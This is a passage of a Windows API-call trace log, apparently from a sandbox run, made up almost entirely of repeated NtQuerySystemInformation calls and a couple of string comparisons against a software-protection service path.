ResultLength=0x0) [0274.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0274.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0274.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd600, Length=0x20, ResultLength=0x0) [0274.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd580, Length=0x20, ResultLength=0x0) [0274.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd580, Length=0x20, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd580, Length=0x20, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x38, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x38, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd650, Length=0x20, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd650, Length=0x20, ResultLength=0x0) [0274.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0274.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0274.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x28, ResultLength=0x0) [0274.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x28, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd350, Length=0x20, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd350, Length=0x20, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x20, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x20, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0274.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0274.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0274.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0274.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0274.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0274.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x28, ResultLength=0x0) [0274.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x28, ResultLength=0x0) [0274.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd350, Length=0x20, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd350, Length=0x20, ResultLength=0x0) [0274.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x20, ResultLength=0x0) [0274.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x20, ResultLength=0x0) [0274.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0274.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6e0, Length=0x28, ResultLength=0x0) [0274.344] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0274.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0274.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0274.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0274.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd530, Length=0x28, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x28, ResultLength=0x0) [0274.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x28, ResultLength=0x0) [0274.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x20, ResultLength=0x0) [0274.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0274.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x20, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0274.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6e0, Length=0x28, ResultLength=0x0) [0274.355] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0274.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0274.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0274.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.359] NtQuerySystemInformation (SystemInformationClass=0xb9, 